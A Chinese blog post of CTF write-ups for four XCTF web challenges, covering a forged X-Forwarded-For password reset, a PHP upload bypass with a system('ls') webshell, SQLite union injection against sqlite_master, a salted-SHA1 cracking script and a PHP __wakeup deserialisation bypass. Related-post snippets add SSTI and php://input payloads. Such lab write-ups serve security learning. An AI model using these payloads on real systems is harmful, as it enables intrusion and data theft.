web攻防世界3

最新推荐文章于 2023-07-29 10:17:13 发布
最新推荐文章于 2023-07-29 10:17:13 发布
阅读量318 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43741181/article/details/102545842
版权

1.bug

题目提示注册,随便输个登录进去

点到manage界面提示不是管理员,

浏览几个选项感觉只有这个修改密码可以操作操作了,抓包修改密码界面,把这里的用户改成admin试试,提示密码小于六位,改一改

这里还需要伪造ip,即用x-forwarded-for即可

 修改成功,用admin登录,即能访问刚才的那个菜单,

猜测文件上传,传个马,

需要绕过,师傅们在这里上传了图片,改了内容,

并且这里后缀可使用.php4,.php5绕过,

加入

<script language='php'>system('ls')</script>

放包得到flag。

 

但现在这种<script language='php'>php表示方法好像已经灭绝了要...

2.FlatScience

 不晓得是什么东西,随便点点,这是什么论文啥玩意的吧...

输入几个常见后台发现,login.php和admin.php有结果,

查看源码发现不让绕过...那就听你的,

发现login源码中有

url跟上?debug得到源码:

发现sql语句

在login中输入注入语句,出现

看了wp说是SQLite数据库的注入,SQLite数据库中有一个叫SQLite_master的表它定义数据库的模式。

抓包,对username进行注入语句

usr=' union select name,sql from sqlite_master--+&pw=

在set-cookie中发现

整理一下,set-cookie就是

CREATE TABLE Users(

id int primary key,

name varchar(255),

password varchar(255),

hint varchar(255)

发现表名和字段

继续用usr进行字段的获取,


usr=%27 UNION SELECT id, id from Users limit 0,1
usr=%27 UNION SELECT id, name from Users limit 0,1
usr=%27 UNION SELECT id, password from Users limit 0,1
usr=%27 UNION SELECT id, hint from Users limit 0,1

可以得到这些数据,

根据hint猜测favword藏在前面看到的pdf里面,需要写个脚本,把里面的词都给提取出来,拼接上”Salz!”然后sha1加密,看看是否跟3fab54a50e770d830c0416df817567662a9dc85c相等。

把PDF都down下来,

附上大爹们的脚本


from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
 
def get_pdf():
    return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print "Searching word in " + i
        pdf_text = convert_pdf_2_text(i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
            if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
                print "Find the password :" + word
                exit()
 
if __name__ == "__main__":
    find_password()
跑得出flag.

3.web2

打开发现源码

提示还是很有意思的

审计源码:反转字符串->循环字符串长度->从$_0位置开始,返回1个字符->返回字符串首个字母的ASCII值->拼接两个变量的内容 赋值->base64,strrev,rot13

将这个顺序反过来编码,即

 

4.unserialize3

源码:

这里用到了—wakeup()绕过

__wakeup()执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行__wakeup()函数。

参考CVE-2016-7124

序列化后值为:O:4:"xctf":2:{s:4:"flag";s:3:"111";}

传进去即得

关于序列化反序列化参考:

https://www.2cto.com/article/201610/557427.html 

c3g07f
关注
专栏目录
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3611
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界(web篇)---warmup
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-30 1533
攻防世界—warmup 文章目录攻防世界---warmup题目 php代码审计用到的php知识highlight_file(__FILE__) 题目 php代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php
攻防世界 web mfw
liuxiaohuai_的博客
03-28 325
打开网页点击about: 看到有提示git 那这个题就先从git源码泄露入手把。 在URL后加入.git/进入: 在linux中使用GitHacker脚本 下载方法: pip install requests #安装需要的第三方库,如果已安装请忽略! git clone https://github.com/wangyihang/GitHacker.git python2 GitHacker.py http://111.200.241.244:38019/.git/ #后面的url可以换成自己想扫的网站,
FlatScience XCTF web进阶区FlatScience详解
林英俊的博客
09-11 748
FlatScience XCTF web进阶区FlatScience详解目录扫描测试注入,万能密码获取所有的PDF的URL,并下载到本地,这里要用下递归把PDF所有的单词全部搞出来 一个个加密对和密码对比登录找到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/aa3376d01a094c57ae92f9e2f2ee3a02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50
XCTF Web 记录(FlatScience)
ximo的博客
03-08 215
前言 今天开始每日一题,周末不更。 FlatScience 进来以后,一串英文,翻译: 最佳论文 嘿!欢迎来到我的(部分未完成)oldskool网站! 我是Flux Horst教授。。“啊,”努夫说-你应该了解我! 这是我迄今为止写的一些著名论文。 也许你自己去看看?! 试试这个或者这个或者到这里来 然后三个可以点击的位置,进去后时pdf文件,查看页面源码也没什么有用的。 查看robots.txt看看有没有信息: 啊,进去看看。 login.php: admin.php: 这里admin页面直接就
xctf攻防世界 Web高手进阶区 FlatScience29
l8947943的博客
12-31 645
这道题真的,无敌了,太尼玛难了,菜鸡哭泣ing 1. 进入环境,查看内容 一通乱点,查看console,啥都没有,于是想着查看源码,使用.git漏洞,看看有没有东西,如图,啥都没有! 一顿乱猜,看看robots.txt,有没有什么限制!得到了提示: 也就是说/login.php和/admin.php是有东西的。 2. 开始解题 打开/login.php,好家伙,还真有登录页面,如图: 一顿瞎猜进不去,看看控制台有啥提示,如图: TODO是打算移除Debug参数,也就是说,要用到debug参数?
攻防世界Web赛题记录
Bit0
10-13 2635
Cat 题目:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4658&page=2 Writeup: 攻防世界-web-Cat(XCTF 4th-WHCTF-2017)_Sea_Sand息禅-CSDN博客 攻防世界 | CAT - laolao - 博客园 [CTF题目总结-web篇]攻防世界:Cat_T2hunz1-CSDN博客 知识点: 1.输入字符 get传递在网址
攻防世界easy_web之SSTI注入
最新发布
m0_66935689的博客
07-29 264
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1336
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
Welcome to my website
weixin_33828101的博客
06-28 390
论坛: http://106.187.55.92/bbs 电子商店: http://106.187.55.92/eshop 导航123: http://106.187.55.92/daohang123 转载于:https://www.cnblogs.com/technical/archive/2012/04/07/2435598.html...
Welcome to Linux From Scratch!
Android移动开发者的专栏
05-31 928
http://www.linuxfromscratch.org/
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 873
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
2018 XCTF FINALS
Risker
11-06 1222
欢迎关注我的新博客: http://mmmmmmlei.cn 有幸参加了 2018 XCTF FINALS,线下长了不少见识。回学校就打了上海市大学生网络安全竞赛,现在记录一下 XCTF FINALS。 攻防赛四道 pwn,Web 狗也只能打打解题这样子… 解题有 5 道 Misc,2 道 Web 和 4 道 pwn,和队友做出了两道 Misc ,一道 Web 和两道 pwn。不得不说这次的 Mi...
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8213
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
XCTF cookie
weixin_30412013的博客
07-10 449
题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗? 打开 根据题目提示找到cookie 在ur后指向cookie.php 查看http的返回 得到flag: cyberpeace{cbd57a0b4f644d2effea26e1297a1a5a} 转载于:https://www.cnblogs.com/this...
攻防世界WEB进阶之FlatScience
harry_c的博客
09-30 5565
攻防世界WEB进阶之FlatScience一、分析二、实操三、答案 FlatScience 难度系数: 1星 题目来源: Hack.lu-2017 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 点击打开场景,发现都是文件下载的内容,是几篇英文文献 上一题有用到的robots.txt,构造一下http://IP:端口/robots.txt 果然有重要内容: 二、实操 分别进入像个网站...
[wp] Hack.lu 2017 FlatScience
MercyLin的博客
09-17 1251
进去就是页面跳来跳去emmm,先扫个目录好了: 扫到一个login.php,查看源码,发现参数debug,传参?debug=1,得到如下代码: <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['usr']; $pass = $_POST['pw'...
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值